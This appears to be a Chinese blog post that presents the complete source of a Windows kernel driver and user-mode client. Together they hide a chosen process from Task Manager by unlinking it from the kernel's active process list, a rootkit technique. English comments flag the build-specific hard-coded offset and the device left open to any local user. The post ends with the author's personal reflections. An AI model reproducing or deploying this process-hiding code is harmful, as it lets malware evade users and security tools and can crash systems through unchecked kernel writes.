内核层如下:
读写进程内存不太想写,以后再补吧
#include <ntifs.h>
#define DEVICE_NAME L"\\Device\\MyDevice"
#define SYMLINK_NAME L"\\DosDevices\\MyDevice"
// One control code for every operation; the Mode field of the request selects the action.
// FILE_ANY_ACCESS means no particular access right is needed to send it, and DriverEntry
// creates the device with IoCreateDevice (no security descriptor), so by default the IOCTL is
// reachable by any local user that can open the device — verify the effective device DACL.
#define IOCTL_PROCESS_MEMORY CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
// Request block exchanged with user mode. METHOD_BUFFERED: it arrives in
// Irp->AssociatedIrp.SystemBuffer. The same layout is duplicated in the user-mode client.
typedef struct MY_PROCESS_INFO {
ULONG Mode; // Operation: 0 = read, 1 = write, 3 = hide process (Mode 2 is not handled by the dispatcher)
ULONG ProcessId; // Target process PID
PVOID Address; // Target address (read/write only; the hide path never reads it)
UCHAR Data[256]; // Payload: data to write in write mode; may be left empty in read mode
} MY_PROCESS_INFO, *P_MY_PROCESS_INFO;
// Prototype for an undocumented kernel export. It is declared here but not called anywhere in
// this file: the read/write helpers below are empty stubs.
NTSTATUS MmCopyVirtualMemory(
PEPROCESS SourceProcess,
PVOID SourceAddress,
PEPROCESS TargetProcess,
PVOID TargetAddress,
SIZE_T BufferSize,
KPROCESSOR_MODE PreviousMode,
PSIZE_T ReturnSize
);
// Forward declarations for the per-mode handlers used by MyDriverDispatchIoctl.
NTSTATUS MyWriteProcessMemory(P_MY_PROCESS_INFO tempProcessInfo);
NTSTATUS MyReadProcessMemory(P_MY_PROCESS_INFO tempProcessInfo);
NTSTATUS MyHiddenProcess(P_MY_PROCESS_INFO tempProcessInfo);
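// IRP_MJ_DEVICE_CONTROL handler.
// Validates the buffered request, resolves the target process, dispatches on Mode, and
// completes the IRP. Returns the completion status.
//
// Fixes over the original: the input length is checked before SystemBuffer is dereferenced
// (a caller passing a short or empty buffer previously read past it / dereferenced NULL), the
// handlers' return values are propagated instead of dropped, IoStatus.Information is bounded
// by the caller's output buffer length, and the ULONG->HANDLE cast goes through ULONG_PTR
// (direct cast warns on 64-bit builds).
NTSTATUS MyDriverDispatchIoctl(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    UNREFERENCED_PARAMETER(DeviceObject);
    DbgPrint("Receive Irp Request!\n");

    PIO_STACK_LOCATION stack = IoGetCurrentIrpStackLocation(Irp);
    ULONG controlCode = stack->Parameters.DeviceIoControl.IoControlCode;
    ULONG inputLength = stack->Parameters.DeviceIoControl.InputBufferLength;
    ULONG outputLength = stack->Parameters.DeviceIoControl.OutputBufferLength;
    NTSTATUS status = STATUS_SUCCESS;
    ULONG_PTR information = 0;

    if (controlCode != IOCTL_PROCESS_MEMORY) {
        status = STATUS_INVALID_DEVICE_REQUEST;
    }
    else if (inputLength < sizeof(MY_PROCESS_INFO) || Irp->AssociatedIrp.SystemBuffer == NULL) {
        // METHOD_BUFFERED: SystemBuffer is only as large as the caller declared (and NULL when
        // both lengths are zero), so the struct must not be touched before this check.
        status = STATUS_BUFFER_TOO_SMALL;
    }
    else {
        P_MY_PROCESS_INFO tempProcessInfo = (P_MY_PROCESS_INFO)Irp->AssociatedIrp.SystemBuffer;
        PEPROCESS targetProcess = NULL;

        // Resolve the PID; on success this takes a reference that must be released below.
        status = PsLookupProcessByProcessId((HANDLE)(ULONG_PTR)tempProcessInfo->ProcessId, &targetProcess);
        if (!NT_SUCCESS(status)) {
            DbgPrint("Failed to find process with PID %lu\n", tempProcessInfo->ProcessId);
        }
        else {
            switch (tempProcessInfo->Mode) {
            case 0: // read
                status = MyReadProcessMemory(tempProcessInfo);
                break;
            case 1: // write
                status = MyWriteProcessMemory(tempProcessInfo);
                break;
            case 3: // hide process
                status = MyHiddenProcess(tempProcessInfo);
                break;
            default:
                status = STATUS_INVALID_PARAMETER;
                DbgPrint("Invalid mode specified: %lu\n", tempProcessInfo->Mode);
                break;
            }
            ObDereferenceObject(targetProcess); // release the lookup reference

            if (NT_SUCCESS(status)) {
                // The I/O manager copies Information bytes back to the caller's output buffer;
                // never report more than the caller provided room for.
                information = min(outputLength, sizeof(MY_PROCESS_INFO));
            }
        }
    }

    Irp->IoStatus.Status = status;
    Irp->IoStatus.Information = information;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return status;
}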
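// IRP_MJ_CREATE / IRP_MJ_CLOSE handler: accepts every open and close unconditionally.
// DeviceObject is unused; it is marked so the WDK's warnings-as-errors build does not fail.
NTSTATUS MyDriverCreateClose(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
    UNREFERENCED_PARAMETER(DeviceObject);
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}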
// Driver unload: removes the symbolic link, then the device object DriverEntry created.
// The link-deletion result is intentionally not checked; unload must proceed regardless.
void MyDriverUnload(PDRIVER_OBJECT DriverObject) {
    UNICODE_STRING symlinkName;
    RtlInitUnicodeString(&symlinkName, SYMLINK_NAME);
    (void)IoDeleteSymbolicLink(&symlinkName);
    IoDeleteDevice(DriverObject->DeviceObject);
}
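// Mode 1 handler. Not implemented yet (the author deferred it). The original empty body fell
// off the end of a non-void function, which is undefined behavior and an MSVC error (C4716);
// return an explicit status so the dispatcher can report it.
NTSTATUS MyWriteProcessMemory(P_MY_PROCESS_INFO tempProcessInfo) {
    UNREFERENCED_PARAMETER(tempProcessInfo);
    return STATUS_NOT_IMPLEMENTED;
}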
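// Mode 0 handler. Not implemented yet (the author deferred it). The original empty body fell
// off the end of a non-void function, which is undefined behavior and an MSVC error (C4716);
// return an explicit status so the dispatcher can report it.
NTSTATUS MyReadProcessMemory(P_MY_PROCESS_INFO tempProcessInfo) {
    UNREFERENCED_PARAMETER(tempProcessInfo);
    return STATUS_NOT_IMPLEMENTED;
}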
// Mode 3 handler: hides a process by direct kernel object manipulation (DKOM) — it unlinks the
// target's entry from the kernel's process list so enumeration (e.g. Task Manager) no longer
// shows it. Returns the PsLookupProcessByProcessId failure status, else STATUS_SUCCESS.
//
// Review notes (defensive): the list-entry offset inside EPROCESS is undocumented and
// build-specific; the value is hard-coded, and the comment on that line names a different
// offset (0x2e8) than the code uses (0x2f0), so there is no evidence either is right for the
// running kernel. Nothing checks that the computed pointer is a LIST_ENTRY: a wrong offset
// writes into unrelated kernel memory. Unlinking a live object from a kernel-owned list is
// the classic signature that kernel integrity protection and EDR list-consistency checks
// look for.
NTSTATUS MyHiddenProcess(P_MY_PROCESS_INFO tempProcessInfo) {
PEPROCESS pProcess;
NTSTATUS status = PsLookupProcessByProcessId((HANDLE)tempProcessInfo->ProcessId, &pProcess); // pass &pProcess (receives a referenced EPROCESS)
if (!NT_SUCCESS(status)) {
DbgPrint("Failed to find process with PID %lu, status: 0x%X\n", tempProcessInfo->ProcessId, status);
return status;
}
// Compute the target's ActiveProcessLinks entry from a hard-coded EPROCESS offset
PLIST_ENTRY activeProcessLinks = (PLIST_ENTRY)((ULONG_PTR)pProcess +0x2f0); // comment originally claimed 0x2e8 "as an example only"; code and comment disagree
// Neighbouring entries
PLIST_ENTRY prevEntry = activeProcessLinks->Blink;
PLIST_ENTRY nextEntry = activeProcessLinks->Flink;
// Unlink this node from the list
prevEntry->Flink = nextEntry;
nextEntry->Blink = prevEntry;
// Point the node at itself so it holds no dangling pointers into the list
activeProcessLinks->Flink = activeProcessLinks;
activeProcessLinks->Blink = activeProcessLinks;
// Release the EPROCESS reference taken by the lookup
ObDereferenceObject(pProcess);
return STATUS_SUCCESS;
}
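// Driver entry point: creates the control device and its DOS symbolic link, then installs the
// dispatch routines. Returns the first failing NTSTATUS, undoing the device creation if the
// symbolic link cannot be created.
//
// RegistryPath is unused and is marked so the WDK's warnings-as-errors build passes.
NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(RegistryPath);

    UNICODE_STRING deviceName = RTL_CONSTANT_STRING(DEVICE_NAME);
    UNICODE_STRING symlink = RTL_CONSTANT_STRING(SYMLINK_NAME);
    PDEVICE_OBJECT deviceObject = NULL;
    NTSTATUS status;

    // No security descriptor is supplied, so the device receives the I/O manager's default
    // DACL; combined with the FILE_ANY_ACCESS IOCTL this typically leaves the control path
    // open to any local user. IoCreateDeviceSecure with an SDDL string is the usual way to
    // restrict it.
    status = IoCreateDevice(DriverObject, 0, &deviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &deviceObject);
    if (!NT_SUCCESS(status)) {
        return status;
    }

    status = IoCreateSymbolicLink(&symlink, &deviceName);
    if (!NT_SUCCESS(status)) {
        IoDeleteDevice(deviceObject); // do not leave a device with no user-mode name behind
        return status;
    }

    DriverObject->MajorFunction[IRP_MJ_CREATE] = MyDriverCreateClose;
    DriverObject->MajorFunction[IRP_MJ_CLOSE] = MyDriverCreateClose;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = MyDriverDispatchIoctl;
    DriverObject->DriverUnload = MyDriverUnload;
    return STATUS_SUCCESS;
}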
应用层:
#include <windows.h>
#include <iostream>
// 这里定义和驱动程序一致的 IOCTL 代码
// Control code; must be identical to the driver's definition.
#define IOCTL_PROCESS_MEMORY CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS)
// Request block; layout must match the driver's MY_PROCESS_INFO exactly (the driver checks
// nothing about it beyond what it reads, so a mismatch here is silent).
typedef struct MY_PROCESS_INFO {
ULONG Mode; // Operation: 0 = read, 1 = write, 3 = hide process
ULONG ProcessId; // Target process PID
PVOID Address; // Target address
UCHAR Data[256]; // Payload: data to write in write mode; may be left empty in read mode
} MY_PROCESS_INFO, * P_MY_PROCESS_INFO;
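// User-mode client: opens the driver's device and sends one Mode 3 request for a
// hard-coded PID. Exit code 0 on success, 1 when the device cannot be opened or the
// IOCTL fails.
//
// Fix over the original: the request struct is value-initialised. The original only
// zeroed Data, so Address (and any padding) was sent to the kernel as uninitialised stack
// memory; bytesReturned is likewise initialised since the driver may complete with 0 bytes.
int main() {
    // Open the device via its symbolic link (must match SYMLINK_NAME in the driver).
    HANDLE hDevice = CreateFile(
        L"\\\\.\\MyDevice",
        GENERIC_READ | GENERIC_WRITE, // desired access
        0,                            // no sharing
        NULL,                         // default security attributes
        OPEN_EXISTING,                // the device must already exist
        FILE_ATTRIBUTE_NORMAL,
        NULL                          // no template file
    );
    if (hDevice == INVALID_HANDLE_VALUE) {
        std::cerr << "Failed to open device: " << GetLastError() << std::endl;
        return 1;
    }

    // Whole struct zeroed; only the fields the hide path reads are then set.
    MY_PROCESS_INFO processInfo = {};
    processInfo.Mode = 3;         // 3 = hide process
    processInfo.ProcessId = 2344; // PID to hide (hard-coded in the original)

    DWORD bytesReturned = 0;
    BOOL success = DeviceIoControl(
        hDevice,
        IOCTL_PROCESS_MEMORY,
        &processInfo, sizeof(MY_PROCESS_INFO), // input buffer
        NULL, 0,                               // no output buffer
        &bytesReturned,
        NULL                                   // synchronous
    );
    if (!success) {
        std::cerr << "DeviceIoControl failed: " << GetLastError() << std::endl;
        CloseHandle(hDevice);
        return 1;
    }

    std::cout << "Process successfully hidden!" << std::endl;
    CloseHandle(hDevice);
    return 0;
}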
记一次踩坑点:
Visual Studio 打包有 Debug 和 Release 两种模式:Debug 模式生成的程序需要目标机器上安装 Visual Studio 才能运行,在没有该环境的系统上可能会报错。
效果:任务管理器里看不到计算器了
另:被一些事情搞得心情特别糟糕,目前做大模型研发,看文档看的一脸懵逼,却还想学习Windows内核,想学的太多,会的太少,另外想做的事情也特别多,到这个年纪可能就是这样吧。
天下的父母都是这样,当自己的孩子有点成就的时候,就特别愿意在别人面前讲。这个年纪,必须完成一些事情了,父母等不了你了。